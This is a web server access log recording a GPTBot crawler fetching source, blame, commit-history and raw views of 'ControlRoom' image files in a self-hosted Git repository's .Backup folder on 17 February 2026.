"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" +[17/Feb/2026:14:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" +[17/Feb/2026:14:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641805] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10885] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" +[17/Feb/2026:14:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" +[17/Feb/2026:14:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" +[17/Feb/2026:14:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" +[17/Feb/2026:14:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699418] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429965] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429966] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429969] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498861] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508484] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" +[17/Feb/2026:14:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" +[17/Feb/2026:14:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" +[17/Feb/2026:14:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699421] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" +[17/Feb/2026:14:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" +[17/Feb/2026:14:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" +[17/Feb/2026:14:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" +[17/Feb/2026:14:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" +[17/Feb/2026:14:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508486] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699430] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498862] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692372] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:15:22 +0000] - 200 200 - GET https 